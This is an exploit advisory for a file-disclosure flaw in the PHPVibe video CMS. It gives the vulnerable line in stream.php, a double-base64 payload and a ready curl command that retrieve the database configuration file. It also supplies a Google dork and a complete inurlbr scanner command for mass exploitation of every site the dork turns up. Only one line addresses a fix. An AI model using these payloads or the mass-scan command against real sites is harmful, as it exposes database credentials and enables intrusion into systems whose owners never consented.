LFD exploiting vulnerability in phpvibe
PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing cms: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine# Exploit Title: phpVibe ALL versions LFD vulnerability
# Google Dork: "powered by phpvibe"
# Date: 2015/07/13 (july 13th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: http://www.phpvibe.com/
# Software Link: http://get.phpvibe.com/
# Version: All versions
# Tested on: linux
http://0day.today/exploit/23877
Vulnerable file:
stream.php
POC:
http://target.tld/stream.php?file=../vibe_config.php@@media
http://target.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09
Code:
$token = htmlspecialchars(base64_decode(base64_decode($_GET["file"])));
File parameter has no validation and sanitization!
exploition can be performed by adding "@@media" to the file name and base64 it two times as below (no registration needed).
With simple request can get access to the database configuration file Mysql.
Example:
curl 'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'
OUTPUT PRINT:
Using inurlbr scanner for mass exploitation:
Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command
SET DORK:
--dork '"powered by phpvibe"'
SET OUTPUT FILE:
-s telefone.txt
SET EXPLOIT GET
--exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'
SET FILTER
Filter results in unique domains.
--unique
SET VALIDATION
Valid results based on your return http code.
Example: --ifcode {ifcode}Usage: --ifcode 200
COMPLETE COMMAND:
php inurlbr.php --dork '"powered by phpvibe"' -s telefone.txt --exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09' --unique --ifcode 200
OUTPUT PRINT:
Solution:
Improving validation of parameters passed to the application.